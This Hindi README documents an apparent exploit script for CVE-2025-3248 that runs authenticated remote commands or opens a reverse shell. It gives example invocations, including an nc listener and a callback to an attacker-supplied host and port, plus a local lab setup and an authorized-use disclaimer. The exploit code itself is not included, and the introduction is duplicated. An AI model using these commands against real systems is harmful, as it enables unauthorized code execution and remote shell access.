
यह पायथन स्क्रिप्ट CVE-2025-3248 का शोषण करके एक असुरक्षित सिस्टम पर मनमाने कमांड निष्पादित करती है या रिवर्स शेल उत्पन्न करती है। इस शोषण का उपयोग करने के लिए प्रमाणीकरण आवश्यक है।
यह Python स्क्रिप्ट CVE-2025-3248 का शोषण करके कमजोर सिस्टम पर मनमाने आदेश निष्पादित करती है या एक रिवर्स शेल उत्पन्न करती है। इस शोषण का उपयोग करने के लिए प्रमाणीकरण आवश्यक है।
requests लाइब्रेरीनिर्भरताएँ स्थापित करें:
pip install requests
python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]
| तर्क | विवरण | आवश्यक |
|---|---|---|
-u, --url | लक्ष्य आधार URL (जैसे, https://target.com) | हाँ |
-l, --login | व्यवस्थापक उपयोगकर्ता नाम | हाँ |
-p, --password | व्यवस्थापक पासवर्ड | हाँ |
-c, --command | लक्ष्य पर निष्पादित करने का कमांड | नहीं* |
--proxy | प्रॉक्सी URL (जैसे, http://127.0.0.1:8080) | नहीं |
--lhost | रिवर्स शेल के लिए स्थानीय होस्ट | नहीं* |
--lport | रिवर्स शेल के लिए स्थानीय पोर्ट | नहीं* |
* आपको रिवर्स शेल के लिए या तो एक कमांड (-c) या --lhost और --lport दोनों निर्दिष्ट करना होगा।
python3 exploit.py -u https://target.com -l admin -p password -c "id"
अपनी मशीन पर एक लिसनर प्रारंभ करें:
nc -lvnp 4444
फिर चलाएं:
python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444
python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080
आप निम्नलिखित कमांड का उपयोग करके Docker इमेज तैनात कर सकते हैं:
podman compose up -d
इमेज http://localhost:7860 पर उपलब्ध होगी।
कंपोज़ फ़ाइल का श्रेय: यह रिपॉजिटरी
यह स्क्रिप्ट केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए है। उन सिस्टमों के विरुद्ध उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है।
यह README AI द्वारा उत्पन्न है।